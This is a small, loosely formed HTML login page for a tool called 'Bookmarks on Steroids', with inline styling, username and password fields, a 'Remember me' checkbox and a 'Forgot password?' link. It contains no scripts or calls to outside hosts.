
<!DOCTYPE html>
<html>
  <head>
     <meta charset="utf-8">
      
    <style type="text/css">

        html, body, #doc, #page-outer {
            height: 96%;
            width: 537px;
            margin: inherit;
      }
        .signin-wrapper{ 
            text-align: center;
         }
          .loginbutton{ 
          cursor: pointer;
          font-size: 12px;
          font-weight: bold;
          padding: 6px 16px;
          text-align: center;
          position: absolute;
          margin-left: 50;
          width: 142px;
          bottom: 41px;
          left: 198px;
       }

       .fieldsetclass { 
          border-width: thick;
           display: -webkit-inline-box;
        }
        .subchck{ 
          width: 94%;
          padding-left: 13px;
          padding-right: 31px;
          float: left;
          padding-bottom: 104px;
        }
         

    </style>
     

      <title>Login on Bookmarks on Steroids</title>

    


      <div class="global-nav-inner">
        <div class="container">

            <div class="page-canvas">

  <div class="signin-wrapper" data-login-message="">
    <h1>Log in to Bookmarks on Steroids</h1>
    <form action="" class="t1-form clearfix signin js-signin" method="post">
      <fieldset class="fieldsetclass">

  <legend class="visuallyhidden">Log in</legend>

  <div class="clearfix field">
    <input
      class="js-username-field email-input js-initial-focus"
      type="text"
      name="session[username_or_email]"
      autocomplete="on" value=""
      placeholder="Phone, email or username"
    />
  </div>
  <div class="clearfix field">
    <input class="js-password-field" type="password" name="session[password]" placeholder="Password">
  </div>


</fieldset>

 <button type="submit" class="loginbutton" form action='login.html'>Log in</button>

  <div class="subchck">
    <label class="t1-label remember" style='text-align: right;'>
      <input type="checkbox" value="1" name="remember_me" checked="checked">
      Remember me
      <span class="separator">·</span>
      <a class="forgot" href="" rel="noopener">Forgot password?</a>
    </label>
  </div>
</div>

    </form>
  </div>



  </body>
</html>
